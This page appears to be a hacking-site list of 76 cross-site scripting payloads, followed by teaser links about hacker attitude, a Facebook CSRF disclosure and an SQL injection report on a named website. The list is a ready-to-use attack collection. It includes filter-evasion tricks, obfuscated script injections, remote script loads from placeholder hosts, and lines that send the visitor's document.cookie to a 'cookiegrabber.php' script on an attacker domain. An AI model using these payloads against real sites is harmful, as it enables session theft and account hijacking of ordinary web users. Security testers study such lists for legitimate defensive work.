1. <script>alert(1);</script>
  2. <script>alert('XSS');</script>
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  6. <script>alert(String.fromCharCode(88,83,83))</script>
  7. <img src=foo.png onerror=alert(/xssed/) />
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  10. <marquee><script>alert('XSS')</script></marquee>
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  15. "><script>alert(0)</script>
  16. <script src=http://yoursite.com/your_files.js></script>
  17. </title><script>alert(/xss/)</script>
  18. </textarea><script>alert(/xss/)</script>
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
  21. <font style='color:expression(alert(document.cookie))'>
  22. '); alert('XSS
  23. <img src="javascript:alert('XSS')">
  24. <script language="JavaScript">alert('XSS')</script>
  25. [url=javascript:alert('XSS');]click me[/url]
  26. <body onunload="javascript:alert('XSS');">
  27. <body onLoad="alert('XSS');"
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  29. "/></a></><img src=1.gif onerror=alert(1)>
  30. window.alert("Bonjour !");
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
  32. alert(String.fromCharCode(88,83,83));'))">
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  34. "><script alert(String.fromCharCode(88,83,83))</script>
  35. '>><marquee><h1>XSS</h1></marquee>
  36. '">><script>alert('XSS')</script>
  37. '">><marquee><h1>XSS</h1></marquee>
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  40. <script>var var = 1; alert(var)</script>
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  44. " onfocus=alert(document.domain) "> <"
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  49. <br size=\"&{alert('XSS')}\">
  50. <scrscriptipt>alert(1)</scrscriptipt>
  51. </br style=a:expression(alert())>
  52. </script><script>alert(1)</script>
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  54. [color=red width=expression(alert(123))][color]
  55. <BASE HREF="javascript:alert('XSS');//">
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  57. "></iframe><script>alert(123)</script>
  58. <body onLoad="while(true) alert('XSS');">
  59. '"></title><script>alert(1111)</script>
  60. </textarea>'"><script>alert(document.cookie)</script>
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  65. '></select><script>alert(123)</script>
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  68. <SCRIPT>document.write("XSS");</SCRIPT>
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  70. ='><script>alert("xss")</script>
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  74. ">/PlanetCreator/><script>alert(document.cookie)</script>
  75. src="http://www.site.com/XSS.js">
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

Explore More

Hackers

Many peoples ask me, what is hacker? I want to be hacker? What What and How How…. Read it. It’s Hacker Attitude. The Hacker Attitude Hackers solve problems and build

Facebook “CSRF” attack-Full Disclosure

How a Facebook App works Anyone can create an application (or app) that will run within the Facebook platform (and many do!). An app is like a regular website with

critical SQL injection (vulnerability) on Dhamma Web http://www.dhammaweb.net

PlanetCreator.Net’s Security Team member zai22 reported another critical SQL injection (vulnerability) on Dhamma Web http://www.dhammaweb.net SQL injection is a code injection technique that exploits a security vulnerability occurring in the